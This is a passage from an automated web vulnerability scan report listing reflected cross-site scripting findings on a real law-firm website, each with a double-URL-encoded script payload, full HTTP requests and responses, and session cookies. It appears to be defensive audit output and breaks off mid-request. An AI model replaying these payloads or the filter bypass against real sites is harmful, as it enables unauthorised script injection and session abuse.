Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui3fcda"><script>alert(1)</script>8c138520eda/ui.resizable.css" value="">
...[SNIP]...

4.165. http://www.wileyrein.com/css/ui/ui.resizable.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.resizable.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f779c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e382088a8c20 was submitted in the REST URL parameter 3. This input was echoed as f779c"><script>alert(1)</script>382088a8c20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui/ui.resizable.cssf779c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e382088a8c20 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.resizable.cssf779c"><script>alert(1)</script>382088a8c20" value="">
...[SNIP]...

4.166. http://www.wileyrein.com/css/ui/ui.slider.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.slider.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2d5f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e87253ed8d10 was submitted in the REST URL parameter 1. This input was echoed as c2d5f"><script>alert(1)</script>87253ed8d10 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /cssc2d5f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e87253ed8d10/ui/ui.slider.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/cssc2d5f"><script>alert(1)</script>87253ed8d10/ui/ui.slider.css" value="">
...[SNIP]...

4.167. http://www.wileyrein.com/css/ui/ui.slider.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.slider.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d474%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1e1c925c625 was submitted in the REST URL parameter 2. This input was echoed as 7d474"><script>alert(1)</script>1e1c925c625 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui7d474%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1e1c925c625/ui.slider.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui7d474"><script>alert(1)</script>1e1c925c625/ui.slider.css" value="">
...[SNIP]...

4.168. http://www.wileyrein.com/css/ui/ui.slider.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.slider.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb3ab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ede52d4ea844 was submitted in the REST URL parameter 3. This input was echoed as eb3ab"><script>alert(1)</script>de52d4ea844 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui/ui.slider.csseb3ab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ede52d4ea844 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.slider.csseb3ab"><script>alert(1)</script>de52d4ea844" value="">
...[SNIP]...

4.169. http://www.wileyrein.com/css/ui/ui.tabs.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.tabs.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5847%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e63b9f9dcf48 was submitted in the REST URL parameter 1. This input was echoed as e5847"><script>alert(1)</script>63b9f9dcf48 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /csse5847%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e63b9f9dcf48/ui/ui.tabs.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/csse5847"><script>alert(1)</script>63b9f9dcf48/ui/ui.tabs.css" value="">
...[SNIP]...

4.170. http://www.wileyrein.com/css/ui/ui.tabs.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.tabs.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81a0d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eee949bf1e89 was submitted in the REST URL parameter 2. This input was echoed as 81a0d"><script>alert(1)</script>ee949bf1e89 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui81a0d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eee949bf1e89/ui.tabs.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui81a0d"><script>alert(1)</script>ee949bf1e89/ui.tabs.css" value="">
...[SNIP]...

4.171. http://www.wileyrein.com/css/ui/ui.tabs.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.tabs.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b92b8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e93dc2b44d56 was submitted in the REST URL parameter 3. This input was echoed as b92b8"><script>alert(1)</script>93dc2b44d56 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui/ui.tabs.cssb92b8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e93dc2b44d56 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.tabs.cssb92b8"><script>alert(1)</script>93dc2b44d56" value="">
...[SNIP]...

4.172. http://www.wileyrein.com/css/ui/ui.theme.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.theme.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8b59%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb748a2e0a4d was submitted in the REST URL parameter 1. This input was echoed as f8b59"><script>alert(1)</script>b748a2e0a4d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /cssf8b59%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb748a2e0a4d/ui/ui.theme.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/cssf8b59"><script>alert(1)</script>b748a2e0a4d/ui/ui.theme.css" value="">
...[SNIP]...

4.173. http://www.wileyrein.com/css/ui/ui.theme.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.theme.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f482%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5de43e0d372 was submitted in the REST URL parameter 2. This input was echoed as 9f482"><script>alert(1)</script>5de43e0d372 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui9f482%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5de43e0d372/ui.theme.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui9f482"><script>alert(1)</script>5de43e0d372/ui.theme.css" value="">
...[SNIP]...

4.174. http://www.wileyrein.com/css/ui/ui.theme.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.theme.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20285%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9291800f59c was submitted in the REST URL parameter 3. This input was echoed as 20285"><script>alert(1)</script>9291800f59c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui/ui.theme.css20285%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9291800f59c HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.theme.css20285"><script>alert(1)</script>9291800f59c" value="">
...[SNIP]...

4.175. http://www.wileyrein.com/index.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /index.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30fea%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e818c7828cb8 was submitted in the REST URL parameter 1. This input was echoed as 30fea"><script>alert(1)</script>818c7828cb8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /index.cfm30fea%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e818c7828cb8 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/index.cfm30fea"><script>alert(1)</script>818c7828cb8" value="">
...[SNIP]...

4.176. http://www.wileyrein.com/index.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7f23"><script>alert(1)</script>472c4d98eb6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.cfm?e7f23"><script>alert(1)</script>472c4d98eb6=1 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="e7f23"><script>alert(1)</script>472c4d98eb6" value="1">
...[SNIP]...

4.177. http://www.wileyrein.com/js/jq.equalheights.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/jq.equalheights.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d732e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3c700324221 was submitted in the REST URL parameter 1. This input was echoed as d732e"><script>alert(1)</script>3c700324221 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /jsd732e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3c700324221/jq.equalheights.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/jsd732e"><script>alert(1)</script>3c700324221/jq.equalheights.js" value="">
...[SNIP]...

4.178. http://www.wileyrein.com/js/jq.equalheights.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/jq.equalheights.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f70d5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0445fb7d91b was submitted in the REST URL parameter 2. This input was echoed as f70d5"><script>alert(1)</script>0445fb7d91b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/jq.equalheights.jsf70d5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0445fb7d91b HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js/jq.equalheights.jsf70d5"><script>alert(1)</script>0445fb7d91b" value="">
...[SNIP]...

4.179. http://www.wileyrein.com/js/jquery.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/jquery.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67315%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e635a97b6d45 was submitted in the REST URL parameter 1. This input was echoed as 67315"><script>alert(1)</script>635a97b6d45 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js67315%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e635a97b6d45/jquery.js HTTP/1.1
